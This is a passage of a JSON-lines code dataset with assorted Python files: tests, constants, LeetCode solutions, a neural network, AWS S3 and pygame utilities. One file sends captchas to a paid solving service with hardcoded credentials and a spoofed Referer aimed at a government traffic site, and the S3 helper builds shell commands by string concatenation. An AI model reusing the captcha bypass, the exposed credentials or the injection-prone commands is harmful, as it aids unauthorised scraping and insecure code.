result[student].append(course)\n\n    print(result)\n\ndisplayStudentSchedule(classRoster)","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"187456657","text":"from django.urls import reverse\nimport pytest\nfrom pytest_django.asserts import assertTemplateUsed\nfrom Post.views import get_post_by_query_text\n\n\nclass TestViews:\n    @pytest.mark.django_db\n    def test_view_posts_GET(self, client):\n        response = client.get(reverse('view posts'))\n        assert response.status_code == 200\n        assertTemplateUsed(response, 'Post/postList.html')\n\n    @pytest.mark.parametrize(\n        \"query_text, expected_output\",\n        [\n            (\"Sea\", [\"Dead Sea\", \"Sea of Galilee\", \"Eilat\"]),\n            (\"beautiful\", [\"Dead Sea\", \"Eilat\", \"`En Yorqe`am\"]),\n            (\"nice\", [\"`En Yorqe`am\"]),\n            (\"place\", [\"`En Yorqe`am\", \"Eilat\", \"Dead Sea\"]),\n            (\"Tal aviv\", []),\n            (\n                \"\",\n                [\n                    \"Dead Sea\",\n                    \"Sea of Galilee\",\n                    \"Eilat\",\n                    \"`En Yorqe`am\",\n                    \"En gedi\",\n                    \"Ramon Crater\",\n                ],\n            ),\n        ],\n    )\n    @pytest.mark.django_db\n    def test_post_exists_after_query(self, query_text, expected_output):\n        posts = get_post_by_query_text(query_text)\n        assert all(post.nameOfLocation in expected_output for post in posts)\n\n    # assert all(course.location in expected_output for course in courses)\n\n    @pytest.mark.django_db\n    def test_verify_response_GET(self, client):\n        response = client.get(reverse('post_list_Search'), {'query_text': 'Galilee'})\n        posts_not_found = [b'Eilat', 
b'Dead Sea', b'`En Yorqe`am']\n assert response.status_code == 200\n assert b'Galilee' in response.content\n assert all(post not in response.content for post in posts_not_found)\n","sub_path":"Post/tests/test_views_posts.py","file_name":"test_views_posts.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"427536608","text":"#!/usr/bin/env python\n\n# Copyright (c) 2017, DIANA-HEP\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"ROOT constants used in deserialization.\"\"\"\n\nimport numpy\n\n# used in unmarshaling\nkByteCountMask = numpy.int64(0x40000000)\nkByteCountVMask = numpy.int64(0x4000)\nkClassMask = numpy.int64(0x80000000)\nkNewClassTag = numpy.int64(0xFFFFFFFF)\n\nkIsOnHeap = numpy.uint32(0x01000000)\nkIsReferenced = numpy.uint32(1 << 4)\n\nkMapOffset = 2\n\n# not used?\nkNullTag = 0\nkNotDeleted = numpy.uint32(0x02000000)\nkZombie = numpy.uint32(0x04000000)\nkBitMask = numpy.uint32(0x00FFFFFF)\nkDisplacementMask = numpy.uint32(0xFF000000)\n\n################################################################ core/zip/inc/Compression.h\n\nkZLIB = 1\nkLZMA = 2\nkOldCompressionAlgo = 3\nkLZ4 = 4\nkUndefinedCompressionAlgorithm = 5\n\n################################################################ constants for streamers\n\nkBase = 0\nkChar = 1\nkShort = 2\nkInt = 3\nkLong = 4\nkFloat = 5\nkCounter = 6\nkCharStar = 7\nkDouble = 8\nkDouble32 = 9\nkLegacyChar = 10\nkUChar = 11\nkUShort = 12\nkUInt = 13\nkULong = 14\nkBits = 15\nkLong64 = 16\nkULong64 = 17\nkBool = 18\nkFloat16 = 19\nkOffsetL = 20\nkOffsetP = 40\nkObject = 61\nkAny = 62\nkObjectp = 63\nkObjectP = 64\nkTString = 65\nkTObject = 66\nkTNamed = 67\nkAnyp = 68\nkAnyP = 69\nkAnyPnoVT = 70\nkSTLp = 71\n\nkSkip = 100\nkSkipL = 120\nkSkipP = 140\n\nkConv = 200\nkConvL = 220\nkConvP = 240\n\nkSTL = 300\nkSTLstring = 365\n\nkStreamer = 500\nkStreamLoop = 501\n\n################################################################ constants from core/foundation/inc/ESTLType.h\n\nkNotSTL = 
0\nkSTLvector = 1\nkSTLlist = 2\nkSTLdeque = 3\nkSTLmap = 4\nkSTLmultimap = 5\nkSTLset = 6\nkSTLmultiset = 7\nkSTLbitset = 8\nkSTLforwardlist = 9\nkSTLunorderedset = 10\nkSTLunorderedmultiset = 11\nkSTLunorderedmap = 12\nkSTLunorderedmultimap = 13\nkSTLend = 14\nkSTLany = 300\n\n################################################################ IOFeatures\n\nkGenerateOffsetMap = 1\n","sub_path":"sparse/repos/chnzhangrui/SgTopWorkshop/binder/uproot/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"520969448","text":"from api.chaojiying import Chaojiying_Client\nfrom monitor.models import SpiderInfo, CheckInfo\nHEADER = {\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Referer': 'https://hn.122.gov.cn/views/inquiry.html',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',\n}\ndef chaojicheck(path,predict,tag_len):\n chaojiying = Chaojiying_Client('mukever', 'abc123456', '96001')\n im = open(path, 'rb').read()\n res = chaojiying.PostPic(im, '100'+tag_len)\n print(res)\n right = 0\n if res['err_no'] ==0:\n if str.upper(res['pic_str'])==predict:\n right = 1\n else:\n chaojiying.ReportError(res['pic_id'])\n return right\n\n","sub_path":"apps/api/postutils.py","file_name":"postutils.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"134098561","text":"from core.advbase import *\n\ndef module():\n return Ramona\n\nclass Ramona(Adv):\n conf = {}\n conf['slots.a'] = ['Summer_Paladyns', 'Primal_Crisis']\n conf['acl'] = \"\"\"\n `dragon(c3-s-s-end),s=1 and not s4.check()\n `s3, not buff(s3)\n `s2, s1.check()\n `s4, s=1\n `s1(all)\n \"\"\"\n conf['coabs'] = ['Gala_Sarisse', 'Wand', 'Marth']\n conf['share'] = ['Summer_Patia']\n\n\n def s(self, n, s1_kind=None):\n if n == 1 and s1_kind == 'all':\n self.current_s['s1'] = s1_kind\n else:\n self.current_s['s1'] = 'default'\n return super().s(n)\n\n\nif __name__ == '__main__':\n from core.simulate import test_with_argv\n test_with_argv(None, *sys.argv)\n","sub_path":"adv/ramona.py","file_name":"ramona.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"638888166","text":"class Solution(object):\n def findRestaurant(self, list1, list2):\n \"\"\"\n :type list1: List[str]\n :type list2: List[str]\n :rtype: List[str]\n \"\"\"\n ans = list()\n minIndex = 0xFFFFFFFF\n for i, item in enumerate(list1):\n if item in list2:\n indexSum = i + list2.index(item)\n if indexSum <= minIndex:\n ans.append(item)\n minIndex = indexSum\n\n return ans\n","sub_path":"src/599.py","file_name":"599.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"434586506","text":"import ECC\nimport hashlib\nimport time\nfrom random import SystemRandom \nrand=SystemRandom()\ncurve=ECC.secp256k1\ndelta = 1000000\ndef fxy(x,y):\n\tA=[[0,0,0],[0,0,0],[0,0,0]]\n\tfp=open('multivariate.txt','r')\n\tl=fp.readlines()\n\t# print(l)\n\tfp.close()\n\tcount = 0\n\tfor i in range (0,3):\n\t\tfor j in range(i,3):\n\t\t\tA[i][j]=int(l[count].split('\\n')[0])\n\t\t\tcount=count+1\n\tfor i in range (1,3):\n\t\tfor j in range (0,i):\n\t\t\tA[i][j] = A[j][i]\n\tX=[]\n\tfor i in range (0,3):\n\t\tX.append((x**i)%curve.p)\n\t# 
print(X)\n\n\tY=[]\n\tfor i in range (0,3):\n\t\tY.append((y**i%curve.p))\n\t# print(Y)\n\t\n\tres1=[0,0,0]\n\tfor i in range( len(X)):\n\t\tfor j in range (len(A[i])):\n\t\t\tfor k in range (len(A)):\n\t\t\t\tres1[i] = ((res1[i]%curve.p)+(A[i][k]*X[k])%curve.p)%curve.p\n\t# print(res1)\n\tmultivariate = 0\n\tfor i in range (len(res1)):\n\t\tmultivariate=(multivariate%curve.p + (res1[i]*Y[i])%curve.p ) %curve.p\n\n\t# print(multivariate)\n\treturn multivariate\n\n","sub_path":"GSS/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"209878783","text":"#! /usr/bin/python3\r\n\r\nimport io\r\nimport os\r\nimport sys\r\nimport pickle\r\nimport requests\r\nfrom scrapers.debate_list import *\r\nfrom scrapers.debate_args import *\r\nfrom scrapers.user_params import *\r\nimport threading\r\nimport asyncio\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\ndest_directory = \"UserProfile_Responses\"\r\nurl = \"http://www.createdebate.com/user/viewprofile/\"\r\n\r\nuser2uuid = pickle.load(open(\"dict_user2uuid\", 'rb'))\r\n\r\ndef fetch_response(user_name):\r\n profile_url = url + user_name\r\n uuid = user2uuid[user_name]\r\n if (not os.path.exists(\"{}/User{}\".format(dest_directory, uuid))):\r\n r = requests.get(profile_url)\r\n print(uuid)\r\n # print(r.text)\r\n with io.open(\"{}/User{}\".format(dest_directory, uuid), 'wb') as f:\r\n pickle.dump(r, f)\r\n\r\n\r\nasync def get_data_asynchronous():\r\n\r\n with ThreadPoolExecutor(max_workers=200) as executor:\r\n loop = asyncio.get_event_loop()\r\n tasks = [\r\n loop.run_in_executor(\r\n executor,\r\n fetch_response,\r\n username\r\n )\r\n for username in user2uuid.keys()\r\n ]\r\n for response in await asyncio.gather(*tasks):\r\n pass\r\n\r\nif __name__ == \"__main__\":\r\n if (not os.path.exists(dest_directory)):\r\n os.mkdir(dest_directory)\r\n loop = asyncio.get_event_loop()\r\n future = asyncio.ensure_future(get_data_asynchronous())\r\n loop.run_until_complete(future)\r\n\r\n","sub_path":"get_all_user_profiles.py","file_name":"get_all_user_profiles.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"364751270","text":"from enum import Enum\n\nfrom .schema import EnumFromName, Identifier, Path, List, Dict\nfrom .loader import Loadable\nfrom .display import Displayable\nfrom .tags import Taggable\nfrom .combat import DamageType, Attack\nfrom .player import Attribute\nfrom .item import WieldSlot\n\nclass Target(Enum):\n SELF = 1\n FRIEND = 2\n ENEMY = 3\n\nclass Ability(Loadable):\n\n SCHEMA = {\n 'spirit_cost': (float, 0.0),\n 'target': (EnumFromName(Target), None),\n 'num_targets': (int, 1),\n 'speed': (float, 3.0),\n 'cooldown': (float, None),\n 'attack': (Attack, None),\n 'resistance': (Dict(EnumFromName(DamageType), float), {}),\n 'modifiers': (Dict(EnumFromName(Attribute), float), {}),\n 'duration': (float, None),\n }\n\nclass Skill(Displayable):\n\n SCHEMA = {\n 'damage': (Dict(EnumFromName(DamageType), float), {}),\n 'resistance': (Dict(EnumFromName(DamageType), float), {}),\n 'modifiers': (Dict(EnumFromName(Attribute), float), {}),\n 'proficiencies': (Dict(Identifier, int), {}),\n 'ability': (Ability, None),\n }\n\nclass Guild(Displayable, Taggable):\n\n SCHEMA = {\n 'karma_cost': (int, 0),\n 'required_guilds': (Dict(Path, int), {}),\n 'exclusive_guilds': (List(Path), []),\n 'title': (str, 'a member'),\n 
'skills': (Dict(int, List(Path)), {}),\n    }\n","sub_path":"amber/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"227957589","text":"\"\"\"\nhttps://leetcode.com/problems/meeting-rooms-ii/\nMeeting Rooms II\nGiven an array of meeting time intervals intervals where intervals[i] = [starti, endi], return the minimum number of conference rooms required.\nExample 1:\nInput: intervals = [[0,30],[5,10],[15,20]]\nOutput: 2\nExample 2:\nInput: intervals = [[7,10],[2,4]]\nOutput: 1\n\"\"\"\n\"\"\"\nclass Solution:\n    def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n\n        # The heap initialization\n        free_rooms = []\n\n        # Sort the meetings in increasing order of their start time.\n        intervals.sort(key= lambda x: x[0])\n\n        # Add the first meeting. We have to give a new room to the first meeting.\n        heapq.heappush(free_rooms, intervals[0][1])\n\n        # For all the remaining meeting rooms\n        for i in intervals[1:]:\n\n            # If the room due to free up the earliest is free, assign that room to this meeting.\n            if free_rooms[0] <= i[0]:\n                heapq.heappop(free_rooms)\n\n            # If a new room is to be assigned, then also we add to the heap,\n            # If an old room is allocated, then also we have to add to the heap with updated end time.\n            heapq.heappush(free_rooms, i[1])\n\n        # The size of the heap tells us the minimum rooms required for all the meetings.\n        return len(free_rooms)\n\"\"\"\n\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n    def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n        intervals.sort(key=lambda x: x[0])\n        free_rooms = [intervals[0][1]]\n        heapq.heapify(free_rooms)\n        for start, end in intervals[1:]:\n            if start >= free_rooms[0]:\n                heapq.heappop(free_rooms)\n            heapq.heappush(free_rooms, end)\n        return len(free_rooms)\n","sub_path":"leetcode-medium/Array/leetcode253MeetingRooms2.py","file_name":"leetcode253MeetingRooms2.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"182701738","text":"import torch\nimport torch.nn.functional as F\nfrom torch.nn import Sequential, Linear, ReLU\nfrom torch_geometric.nn import GINConv, global_add_pool\n\nclass GIN_MLP(torch.nn.Module):\n    def __init__(self, num_features, num_classes, dim=32):\n        super(GIN_MLP, self).__init__()\n\n        nn1 = Sequential(Linear(num_features, dim), ReLU(), Linear(dim, dim))\n        self.conv1 = GINConv(nn1)\n        self.bn1 = torch.nn.BatchNorm1d(dim)\n\n        nn2 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n        self.conv2 = GINConv(nn2)\n        self.bn2 = torch.nn.BatchNorm1d(dim)\n\n        nn3 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n        self.conv3 = GINConv(nn3)\n        self.bn3 = torch.nn.BatchNorm1d(dim)\n\n        nn4 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n        self.conv4 = GINConv(nn4)\n        self.bn4 = torch.nn.BatchNorm1d(dim)\n\n        nn5 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n        self.conv5 = GINConv(nn5)\n        self.bn5 = torch.nn.BatchNorm1d(dim)\n\n        self.fc1 = Linear(dim, dim)\n        self.fc2 = Linear(dim, num_classes)\n\n    def forward(self, x, edge_index, batch):\n        x = F.relu(self.conv1(x, edge_index))\n        x = self.bn1(x)\n        x = F.relu(self.conv2(x, edge_index))\n        x = self.bn2(x)\n        x = F.relu(self.conv3(x, edge_index))\n        x = self.bn3(x)\n        x = F.relu(self.conv4(x, edge_index))\n        x = self.bn4(x)\n        x = F.relu(self.conv5(x, edge_index))\n        x = self.bn5(x)\n        x = global_add_pool(x, batch)\n        x = F.relu(self.fc1(x))\n        x = F.dropout(x, p=0.5, 
training=self.training)\n        x = self.fc2(x)\n        return F.log_softmax(x, dim=-1)\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"52539557","text":"__author__ = 'Evan'\n\nimport tkinter as tk\n\n\ndef create_window():\n    top = tk.Toplevel()\n    top.title(\"About\")\n    top.geometry('150x100')\n\n    msg = tk.Message(top, text=\"Author - Evan Harry\")\n    msg.pack()\n\n    button = tk.Button(top, text=\"Close\", command=top.destroy)\n    button.pack()","sub_path":"UI/about_window.py","file_name":"about_window.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"129270340","text":"from pyheal import wrapper\nfrom pyheal import ciphertext_op\nimport os, sys\nimport numpy as np\ntry:\n    import boto3\n    import tempfile\n    import zipfile\n    from concurrent import futures\n    from io import BytesIO\nexcept ImportError:\n    pass\nsys.path.append(os.path.dirname(sys.path[0]))\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass S3():\n    def __init__(self, isClient=False, isLocal=False):\n        self.isClient = isClient\n        self.isLocal = isLocal\n        if not isLocal and isClient:\n            self.s3 = boto3.client('s3')\n\n    def download_file(self, bucket, key, filename):\n        print(\"s3: downloading a file from \" + bucket + \"/\" + key + \" as \" + filename)\n        if self.isLocal:\n            os.system(\"cp \" + bucket + \"/\" + key + \" \" + filename)\n        else:\n            if not self.isClient:\n                self.s3.download_file(bucket, key, filename)\n            else:\n                os.system(\"aws s3 cp s3://\" + bucket + \"/\" + key + \" \" + filename)\n\n    def upload_file(self, filename, bucket, key):\n        print(\"s3: uploading {} as {}/{}\".format(filename,bucket,key))\n        if self.isLocal:\n            os.system(\"mkdir -p \" + bucket)\n            os.system(\"cp \" + filename + \" \" + bucket + \"/\")\n        else:\n            if not self.isClient:\n                self.s3.upload_file(filename, bucket, key)\n            else:\n                os.system(\"aws s3 cp \" + filename + \" s3://\" + bucket + \"/\")\n\n    def download_obj_local(self, bucket, key):\n        print(\"S3: downloading an object from \" + bucket + \"/\" + key)\n#        with open(bucket + \"/\" + key, \"r\") as f:\n#            data = f.read()\n#            matrix = [item.split() for item in data.split('\\n')[:-1]]\n#            if (len\n        data = np.loadtxt(bucket + \"/\" + key)\n        return data\n\n    def upload_obj_local(self, obj, bucket, key):\n        print(\"S3: uploading object as \" + bucket + \"/\" + key)\n        os.system(\"mkdir -p \" + bucket)\n        if isinstance(obj, ciphertext_op.CiphertextOp) or \\\n           isinstance(obj, wrapper.Ciphertext) or \\\n           isinstance(obj, wrapper.Plaintext):\n            obj.save(bucket + \"/\" + key)\n        else:\n            with open(bucket + \"/\" + key, \"w\") as f:\n                if isinstance(obj, list):\n                    for line in obj:\n                        np.savetxt(f, line)\n                else:\n                    np.savetxt(f, np.array([obj]))\n#                f.write(str(obj))\n#                f.close()\n#        os.system(\"cp /tmp/\" + key + \" \" + bucket + \"/\")\n\n    # This is a wrapper for download_file.\n    # It returns the file content as an object\n    # to be trackable by compiler\n    def download_obj(self, bucket, key, filename):\n        self.download_file(bucket, key, filename)\n        with open(filename, 'rb') as fi:\n            content = fi.read()\n        return content\n\n    # This is a wrapper for upload_file. 
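It passes obj through untouched so the uploaded object stays trackable by the compiler; the data itself comes from the file on disk.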
\n    def upload_obj(self, obj, filename, bucket, key):\n        self.upload_file(filename, bucket, key)\n\n    # [Run on Lambda] \n    def extract_each(self, bucket, path, filename, zipdata):\n        upload_status = 'success'\n        try:\n            self.s3.upload_fileobj(\n                BytesIO(zipdata.read(filename)),\n                bucket,\n                os.path.join(path, filename)\n            )\n        except Exception:\n            upload_status = 'fail'\n        finally:\n            return filename, upload_status\n\n    # [Run on Lambda] Download zip file in memory and upload to s3\n    def extract_and_upload(self, bucket, zipfilename):\n        temp_file = tempfile.mktemp()\n        self.s3.download_file(bucket, zipfilename, temp_file)\n        zipdata = zipfile.ZipFile(temp_file)\n        for filename in zipdata.namelist():\n            n, res = self.extract_each(bucket, '', filename, zipdata)\n\n    # [Run on Client]\n    def download_and_extract(self, bucket, key, filename):\n        self.s3.download_file(bucket, key, filename)\n        with zipfile.ZipFile(filename, 'r') as zf:\n            zf.extractall(os.path.dirname(filename))\n            zf.close()\n        #zipfile.ZipFile(filename).extractall(os.path.dirname(filename))\n\n    # [Run on Lambda]\n    def compress_and_upload(self, bucket, file_list, zipfilename):\n        with zipfile.ZipFile(os.path.join(\"/tmp\",zipfilename), \"w\") as zf:\n            for f in file_list:\n                zf.write(f, os.path.basename(f))\n            zf.close()\n        self.s3.upload_file(os.path.join(\"/tmp\",zipfilename), bucket, zipfilename)\n","sub_path":"utils/s3_helper.py","file_name":"s3_helper.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"207793558","text":"import pygame.font\nfrom pygame.sprite import Group\n\nfrom ship import Ship\n\nclass Scoreboard:\n    \"\"\"Report scoring information.\"\"\"\n\n    def __init__(self, ai_game):\n        \"\"\"Initialize scorekeeping attributes.\"\"\"\n        self.ai_game = ai_game\n        self.screen = ai_game.screen\n        self.screen_rect = self.screen.get_rect()\n        self.setting = ai_game.sts\n        self.stats = ai_game.stats\n\n        # Font settings for the score display\n        self.text_color = (255, 255, 255)\n        self.text_font = pygame.font.SysFont(None, 25)\n\n        # Prepare the initial images\n        self.prep_score()\n        self.prep_high_score()\n        self.prep_level()\n        self.prep_ships()\n\n    def prep_ships(self):\n        \"\"\"Show how many ships are left.\"\"\"\n        self.ships = Group()\n        for number in range(self.stats.ships_num):\n            ship = Ship(self.ai_game)\n            ship.rect.x = 10 + ship.rect.width * number\n            ship.rect.y = 10\n            self.ships.add(ship)\n\n    def prep_score(self):\n        \"\"\"Turn the score into a rendered image.\"\"\"\n        round_score = round(self.stats.score, -1)\n        score_str = \"{:,}\".format(round_score)\n        self.score_image = self.text_font.render(score_str, True, self.text_color)\n\n        # Display the score at the top right of the screen\n        self.score_image_rect = self.score_image.get_rect()\n        self.score_image_rect.right = self.screen_rect.right - 20\n        self.score_image_rect.top = self.screen_rect.top + 20\n\n    def prep_high_score(self):\n        \"\"\"Render the all-time high score.\"\"\"\n        if self.stats.high_score < self.stats.score:\n            self.stats.high_score = self.stats.score\n        round_score = round(self.stats.high_score, -1)\n        score_str = \"{:,}\".format(round_score)\n        st = f\"High Score:{score_str}\"\n        self.high_score_image = self.text_font.render(st, True, self.text_color)\n\n        # Center it at the top of the screen\n        self.high_score_image_rect = self.high_score_image.get_rect()\n        self.high_score_image_rect.top = self.screen_rect.top\n        self.high_score_image_rect.centerx = self.screen_rect.centerx\n\n    def prep_level(self):\n        \"\"\"Render the current level.\"\"\"\n        level_str = f\"Level:{self.stats.ship_level}\"\n        self.level_image = self.text_font.render(level_str, True, self.text_color)\n\n        # Position it below the score\n        self.level_image_rect = self.level_image.get_rect()\n        self.level_image_rect.top = 
self.screen_rect.top + 40\n        self.level_image_rect.right = self.screen_rect.right - 20\n\n    def show_score(self):\n        \"\"\"Draw scores, level, and ships to the screen.\"\"\"\n        self.screen.blit(self.score_image, self.score_image_rect)\n        self.screen.blit(self.high_score_image, self.high_score_image_rect)\n        self.screen.blit(self.level_image, self.level_image_rect)\n        self.ships.draw(self.screen)\n\n\n\n","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"496376675","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport math\n\nfrom abstest import my_abs\n\ndef move(x, y, step, angle=0):\n    if (not isinstance(x, (int, float))\n            or not isinstance(y, (int, float))\n            or not isinstance(step, (int, float))\n            or not isinstance(angle, (int, float))):\n        raise TypeError('bad operand type')\n    nx = x + step * math.cos(angle)\n    ny = y - step * math.sin(angle)\n    return nx, ny\n\ndef quadratic(a, b, c):\n    # Validate the coefficients themselves, not a range built from them\n    for n in (a, b, c):\n        if not isinstance(n, (int, float)):\n            raise TypeError('Bad operand type')\n\n    if a == 0:\n        raise TypeError('The quadratic coefficient cannot be 0')\n\n    delta = b * b - 4 * a * c\n    if delta < 0:\n        return None\n    else:\n        x1 = (-b + math.sqrt(delta)) / (2 * a)\n        x2 = (-b - math.sqrt(delta)) / (2 * a)\n        return (x1, x2)\n\nn = my_abs(-20)\nprint(n)\n\n# TypeError: bad operand type\n#my_abs('123')\n\n\nx, y = move(100, 100, 60, math.pi / 6)\nprint(x, y)\n\n\n# Tests:\nprint('quadratic(2, 3, 1) =', quadratic(2, 3, 1))\nprint('quadratic(1, 3, -4) =', quadratic(1, 3, -4))\n\nif quadratic(2, 3, 1) != (-0.5, -1.0):\n    print('Test failed')\nelif quadratic(1, 3, -4) != (1.0, -4.0):\n    print('Test failed')\nelse:\n    print('Test passed')\n","sub_path":"ik-test/python/samples/function/def_func.py","file_name":"def_func.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"556568908","text":"# Class that makes instances of various parts and information on a car. \r\n\r\nclass Car():\r\n\t\"\"\" Methods to describe a car. \"\"\"\r\n\t\r\n\tdef __init__(self,make,model,year):\r\n\t\t\"\"\" Initialize attributes to the car for methods. \"\"\"\r\n\t\tself.make = make \r\n\t\tself.model = model \r\n\t\tself.year = year \r\n\t\tself.odometer = 0 \r\n\t\t\r\n\tdef car_description(self):\r\n\t\t\"\"\" Returns the car's description neatly formatted. \"\"\"\r\n\t\tinfo = str(self.year) + ' ' + self.make.title() + ' ' \r\n\t\tinfo += self.model.title()\r\n\t\t\r\n\t\treturn info\r\n\t\r\n\tdef read_odometer(self):\r\n\t\t\"\"\" Prints the car's mileage. \"\"\"\r\n\t\tprint(\"Car Mileage: \" + str(self.odometer))\r\n\t\t\r\n\tdef update_odometer(self, miles):\r\n\t\t\r\n\t\tif miles >= self.odometer:\r\n\t\t\tself.odometer = miles \r\n\t\telse:\r\n\t\t\tprint(\"can't roll the odometer back\")\r\n\t\t\t\r\n\t\treturn self.odometer\t\t\r\n\r\n\tdef increment_odometer(self,travel_miles):\r\n\t\t\"\"\" Add miles to the odometer. 
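Unlike update_odometer, no rollback check is applied here; the miles are simply added. 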
\"\"\"\r\n\t\tself.odometer += travel_miles\r\n\t\t\r\n\r\ndream_car = Car('jeep','wrangler unlimited sport s',2018)\r\n\r\nprint(dream_car.car_description())\r\n\r\ndream_car.read_odometer() \r\n\r\ndream_car.odometer = 12000 # Manual method of chaning default attribute\r\n\r\ndream_car.read_odometer()\r\n\r\ndream_car.update_odometer(150) # Method built to change attribute\r\n\r\ndream_car.read_odometer()\r\n\r\ndream_car.increment_odometer(100000) # Additional method to change att.\r\n\r\ndream_car.read_odometer() \r\n","sub_path":"chapter_9/car_description.py","file_name":"car_description.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"312775241","text":"class Solution(object):\n def reverseWords(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n # s = s.strip().split()\n # result = []\n # for i in range(len(s)-1,-1,-1):\n # if s[i] != ' ':\n # result.append(s[i])\n # return ' '.join(result)\n\n result = []\n s = s.strip()\n i = j = len(s)-1\n while i>=0:\n while i>=0 and s[i]!=' ':\n i-=1\n result.append(s[i+1:j+1])\n while s[i]== ' ':\n i-=1\n j=i\n return ' '.join(result)\n\ns = Solution()\nprint(s.reverseWords(\"a good example\"))","sub_path":"面试题58 - I翻转单词顺序.py","file_name":"面试题58 - I翻转单词顺序.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"547691598","text":"\"\"\"empty message\n\nRevision ID: 1217a2e3ce7e\nRevises: 1402a9a4e97e\nCreate Date: 2016-03-05 11:32:09.364053\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1217a2e3ce7e'\ndown_revision = '1402a9a4e97e'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('conference_space',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('space_name', sa.String(length=64), nullable=True),\n sa.Column('location_id', sa.Integer(), nullable=True),\n sa.Column('event_date', sa.Date(), nullable=True),\n sa.Column('start_time', sa.DateTime(), nullable=True),\n sa.Column('end_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('space_name')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
